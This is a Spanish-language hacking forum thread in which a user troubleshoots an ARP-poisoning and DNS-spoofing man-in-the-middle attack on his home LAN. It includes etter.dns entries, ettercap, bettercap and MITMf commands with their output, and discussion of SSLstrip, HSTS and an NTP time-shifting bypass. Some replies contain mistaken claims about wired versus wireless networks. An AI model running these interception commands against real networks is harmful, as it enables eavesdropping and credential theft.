Que tal a todos, os comento la situación.
mi ip: 192.168.0.168
ip victima: 192.168.0.161
puerta enlace: 192.168.0.1
pc1 - 192.168.0.161(pc fisico con antena tplink)
pc2 - 192.168.0.168 (vmware con kali y antena alfa compatible modo monitor)
modifico el archivo etter.dns /etc/ettercap/etter.dns
*.underc0de.org A 192.168.0.168
*.underc0de.* A 192.168.0.168
www.underc0de.* A 192.168.0.168
*underc0de.* A 192.168.0.168
comando ettercap
ettercap -T -q -P dns_spoof -i wlan0 -M arp /// ///
respuesta ettercap al acceder a la underc0de desde el pc kali, en el realizo el dns_spoof
ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team
Listening on:
wlan0 -> 00:C0:...........................
192.168.0.168/255.255.255.0
........................................
Privileges dropped to EUID 0 EGID 0...
33 plugins
42 protocol dissectors
57 ports monitored
20388 mac vendor fingerprint
1766 tcp OS fingerprint
2182 known services
Lua: no scripts were specified, not starting up!
Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %
4 hosts added to the hosts list...
ARP poisoning victims:
GROUP 1 : ANY (all the hosts in the list)
GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...
Text only Interface activated...
Hit 'h' for inline help
Activating dns_spoof plugin...
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
dns_spoof: A [underc0de.org] spoofed to [192.168.0.168]
Y desde el pc victima ni si quiera muestra una respuesta en ettercap, utilizo el navegador del pc victima para ver si puedo acceder al servidor de kali y efectivamente puedo ver la pagina introduciendo la url, no se porque no cambia los dns de las victimas y desde el pc de kali simplemente muestra un error al acceder a la pagina como si no existiera ¿alguna idea?
Primero: levanta el servicio apache que seria service apache2 start
Segundo: seria el https busca una pagina que no tenga https. ocupa este http://www.jaidefinichon.com/
(http://www.subeimagenes.com/img/captura-de-pantalla-de-2016-02-17-08-38-33-1641130.png)
El servicio apache ya estaba levantado, fijate que puse que accedi al servidor desde el navegador, pero solucione a muy poco el problema con
echo 1 > /proc/sys/net/ipv4/ip_forward
Pero no hay manera que funcione en los demas conectados, al hacer esto ya pueden redirigir a mi ip pero solo con kali que es desde donde realizo el ataque pero como bien dices solo con http, aun asi los dns de las victimas no cambian por ejemplo en windows 10 que es la pc 1 accede a las paginas originales y tambien probe desde el movil donde ni siquiera puede acceder a ninguna pagina cuando se realiza el ataque, es como si no resolviera ninguna url, en kali hago ping y efectivamente la ip es la mia local pero en windows 10 es la original la tabla arp tampoco cambia, lo que no entiendo es porque afecta a la maquina virtual y no a los demas si se encuentran en la misma red local, lo unico que estoy pensando es que los navegadores tienen proteccion sobre este tipo de ataques
Una duda que me cuestieno es ¿puede ser que ettercap no funcione? ¿ni dnsspoofin? ¿ni un ataque main in the middle? es que esta pregunta me tiene intrigado por que hace años lo probé y funcionaba y ahora estoy haciendo lo mismo y no funciona, ¿es que los router tienen seguridad ya para esto? ¿ y los navegadores?
@$francisco https
Yo he tenido problemas similares, se ve que el https jode bastante, pero seguro que hay alguna forma de saltárselo
@D4RKS0N1K (https://underc0de.org/foro/index.php?action=profile;u=3020) SSL, ettercap es super antiguo existe miles herramienta mucho mejores que hace lo mismo es cuestion de buscar otras herramientas
¿por ejemplo? es que yo estoy probando con las que trae kali que supuestamente son las mejores para pentesting o al menos eso creo.
bettercap, mitmf, Xerosploit es de googlear kali trae las herramientas mas populares y preciso pero también existen desarrolladores por ejemplo kali no te trae fluxion y esa es una buena herramienta
he probado bettercap.
sudo bettercap -X -G 192.168.0.1 --proxy -I wlan0 -S ARP
Y no captura nada y también con mitmf.
mitmf --spoof --dns --arp --gateway 192.168.0.1 -i wlan0
Y sigo con lo mismo, sin capturar nada y en todas las webs que mira lo explican de esta manera, tambien he probado indicanto una dirección ip como target pero tampoco captura ningún trafico, ¿que puede estar pasando? Es algo realmente extraño ya que en todos los ejemplos se ve de esta manera sencilla pero ninguna funciona y ya no se de que manera para poder capturar trafico y utilizar sslstrip2 ya que bettercap y mitmf lo llevan incorporado.
Buenas! Me parece que es un tema con el HSTS. Probaste con SSLStrip2? Que pasa desde Explorer?
salu2
no es por desanimar pero yo en mi humilde opnion nada funciona sobre https si el sitio o la direccion del tiene bien montado el tema
ni ssltrip me aviaba el busador ni etercap haciendo dnsspoof o sea nada todos me dan fallo sobre https
se lo han currao bien la unica manera es con cert validado crear host dominio ...... y google lo detecta a los pocos dias que digo no tarda mas de 24 horas en ser detectado por la base de google ;D ;D ;D
Los navegadores tienen buenas protecciones últimamente, pero no es un desanime a intentar. Por favor, que de algú. lado salen las ideas.
y tampoco es tan desalentador. Si ya nos encontramos en la red Evilgrade y nos vimos.
pero ¿supuestamente mitmf ya viene instalado? lo digo porque en la linea de comandos me dice que se ejecuta pero sigue sin capturar, lo probé con chrome y firefox pero lo que he detectado sobre todo es que no funciona el dns spoofin de ninguna de las maneras no se si alguien sabe el motivo de porque todas estas herramientas no funcionan si supuestamente son "nuevas" adaptadas para los nuevos protocolos y sistemas de protección con cache y demas...
No la he usado aún. Creo que MITMf sólo sería útil con SSLstrip2. Que yo sepa, no se conoce otra manera de saltear eficaz y remotamente la protección de SSL. Si lo piensan bien, tiene mucho sentido. ¿Cómo vamos a estar al descubierto con una vulnerabilidad de explotación remota con un par de clics como si fuera Windows XP?
(http://picateshackz.com/wp-content/uploads/2015/01/2-1.jpg)
Bueno, el HSTS se encarga de eso. Digamos que el navegador tiene una herramienta de fábrica donde vienen precargadas algunas preferencias para muchas de las webs. Por ejemplo: Queres conectarte a Google.com? Bueno, entonces te obligo a que te conectes a "este host" y mediante "este protocolo" (HTTPS). En caso de no poder, no lograrás hacerlo funcionar porque HSTS es una protección de nivel del cliente.
Por otro lado. Yo te diría que cuando ves una caja fuerte, lo primero que tenés que comprobar es si tiene los tornillos a la vista. Esta manera de probar a la fuerza si podes hacer un downgrade de cifrado no tiene mucho sentido por la complicidad. Creo que es mejor intentar por otro lado.
Como tip: con un script que llama al ataque DeLorean, puede saltear el HSTS de una máquina cambiándole el tiempo de una máquina remotamente. Eso si, sólo serviría si mantiene peticiones NTP, así que estaríamos hablando de S.O.s en particular o de ciertas configuraciones hechas por alguien.
(https://4.bp.blogspot.com/-JWPY9aM2dHc/V4K0sWVZn_I/AAAAAAAARI8/Or9X_0a_XgkizNNjFZQ0VqCO2uuH_XgtACLcB/s1600/delorean.png)
(He aquí el link a referencia: http://blog.segu-info.com.ar/2016/07/hsts-como-saltear-https-en-la-practica.html (http://blog.segu-info.com.ar/2016/07/hsts-como-saltear-https-en-la-practica.html) )
Quizás puedas encontrar la forma de cambiar la fecha del equipo remotamente hacia muchos años al futuro para que los certificados queden inválidos, aunque también levantaría alarmas del sistema.
(https://sophosnews.files.wordpress.com/2015/02/security-not-trusted-500.jpg?w=640)
Saludos, Roadd.:)
La verdad que no se como hacer ver si le llega el response, pero he probado ha hacer el ARP por el router, tambien a solo una maquia y tambien a envenenar a toda la red, activando el dns solo consigo que funcione en la maquina de kali que es desde la que ejecuto los comandos, ni si quiera haciendo "ipconfig/flushdns" funciona los dns cambiados, probe con páginas con https y http y tampoco entonces decidí hacer algo mas sencillo
root@kali:~# sudo bettercap -T 192.168.0.163 --proxy -I wlan0
_ _ _
| |__ ___| |_| |_ ___ _ __ ___ __ _ _ __
| '_ \ / _ \ __| __/ _ \ '__/ __/ _` | '_ \
| |_) | __/ |_| || __/ | | (_| (_| | |_) |
|_.__/ \___|\__|\__\___|_| \___\__,_| .__/
|_| v1.5.8
http://bettercap.org/
[I] Starting [ spoofing:✔ discovery:✘ sniffer:✘ tcp-proxy:✘ http-proxy:✔ https-proxy:✘ sslstrip:✔ http-server:✘ dns-server:true ] ...
[I] [wlan0] 192.168.0.168 : x / wlan0 ( ALFA )
[I] [GATEWAY] 192.168.0.1 : x ( Huawei Technologies )
[I] [DNS] Starting on 192.168.0.168:5300 ...
[I] [TARGET] 192.168.0.163 : x ( BQ )
[I] [HTTP] Proxy starting on 192.168.0.168:8080 ...
Como podeis ver intento capturar el trafico de mi telefono movil, navego un poco con mi movil en paginas http y https y no muestra nada de ninguna de las maneras ni con bettercap ni con mitmf y ya se me acaban las ideas.
Que onda con Wireshark? Estas usando una red inalambrica? Estas haciendo mucho embrollo. Los ataques ARP son para una red cableada! ;D
Utilice wireshark con el filtro
ip.addr==192.168.0.1
Y me dice en algunos paquetes que se detecta una ip duplicada y me indica que es la del router, la verdad no sabia que solo fuera por cable, yo pensaba que por wifi tambien se podia hacer por cierto ¿cual es el motivo que no se pueda hacer por wifi?
Para eso deberías leer desde qué es la tabla ARP y cual es el protocolo que utiliza. Desde ahí cual es el sistema de comunicación inalámbrica. Entenderías por qué. Es muy fácil pero no me parece que tenga que contestar a esta pregunta en este post, ya que se desviaría y se haría muy extenso. Te recomiendo que leas un poco sobre eso y muchas dudas se te resolverán :)
Pues muchas gracias por todas las respuestas, me quedo claro ahora a seguir leyendo.
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Que onda con Wireshark? Estas usando una red inalambrica? Estas haciendo mucho embrollo. Los ataques ARP son para una red cableada! ;D
Estas meando afuera de la lata man. Una red cableada/inalambrica funcionan bajo el mismo protocolo. No tiene nada que ver eso, los ataques ARP solo funcionan en redes LAN.
Pero una red wifi y cableada estan en la misma lan
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Que onda con Wireshark? Estas usando una red inalambrica? Estas haciendo mucho embrollo. Los ataques ARP son para una red cableada! ;D
Estas meando afuera de la lata man. Una red cableada/inalambrica funcionan bajo el mismo protocolo. No tiene nada que ver eso, los ataques ARP solo funcionan en redes LAN.
No es necesario un ataque ARP en una red inalambrica. Podes capturar los paquetes porque total es un broadcast constante.